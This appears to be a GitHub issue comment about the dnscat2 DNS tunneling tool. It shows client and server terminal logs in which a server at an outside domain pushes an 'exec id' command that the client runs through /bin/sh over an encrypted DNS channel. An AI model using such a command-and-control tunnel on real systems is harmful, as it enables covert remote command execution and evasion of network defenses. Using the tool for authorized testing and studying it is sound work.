If an exec command is given to the client, the client executes it and then exits, for example:
$ ./dnscat --dns domain=dnscat2.smelkovs.com --secret acme
Creating DNS driver:
domain = dnscat2.smelkovs.com
host = 0.0.0.0
port = 53
type = TXT,CNAME,MX
server = 8.8.8.8
** Peer verified with pre-shared secret!
Session established!
Got a command: COMMAND_EXEC [request] :: request_id: 0x0001 :: name: id :: command: id
[[ WARNING ]] :: Starting: /bin/sh -c 'id'
[[ WARNING ]] :: Started: id (pid: 21779)
Response: COMMAND_EXEC [response] :: request_id: 0x0001 :: session_id: 0xdf29
** Peer verified with pre-shared secret!
Session established!
konrads@dickens:~/dnscat2/
And server:
r$ sudo ruby ./dnscat2.rb -e open dnscat2.smelkovs.com --secret acme -a 'exec id'
New window created: 0
New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.
auto_attach => false
auto_command => exec id
history_size (for new windows) => 1000
Security policy changed: Client can decide on security level
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = dnscat2.smelkovs.com]...
Assuming you have an authoritative DNS server, you can run
the client anywhere with the following (--secret is optional):
./dnscat --secret=acme dnscat2.smelkovs.com
To talk directly to the server without a domain name, run:
./dnscat --dns server=x.x.x.x,port=53 --secret=acme
Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.
dnscat2> New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
New window created: 2
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
dnscat2>
Lz1y
commented
4 years ago
If an exec command is given to the client, the client executes it and then exits, for example:
And server: